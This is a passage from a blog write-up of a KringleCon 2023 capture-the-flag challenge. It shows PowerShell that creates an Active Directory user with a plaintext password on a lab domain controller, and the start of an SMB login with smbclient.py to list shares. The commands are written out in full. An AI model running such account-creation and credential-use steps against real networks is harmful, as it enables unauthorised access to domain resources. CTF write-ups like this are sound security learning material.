lavafroth/lavafroth.github.io/content/post/kringlecon-2023-writeup.md

 Import-Module ActiveDirectory; $UserName = "elfy"; $UserDomain = "northpole.local"; $UserUPN = "$UserName@$UserDomain"; $Password = ConvertTo-SecureString "J4`ufC49/J4766" -AsPlainText -Force; $DCIP = "10.0.0.53"; New-ADUser -UserPrincipalName $UserUPN -Name $UserName -GivenName $UserName -Surname "" -Enabled $true -AccountPassword $Password -Server $DCIP -PassThru
 ```

+I will set this password as an environment variable for easy access in later commands.

 ```sh
 PW='J4`ufC49/J4766'
 ```
+Now we can use smbclient with that environment variable for logging in as Elfie into `northpole.local`.

 ```
 smbclient.py "northpole.local/elfy:$PW@10.0.0.53"
 ```

+We will use the `shares` command to list the available shares.

 ```
 # shares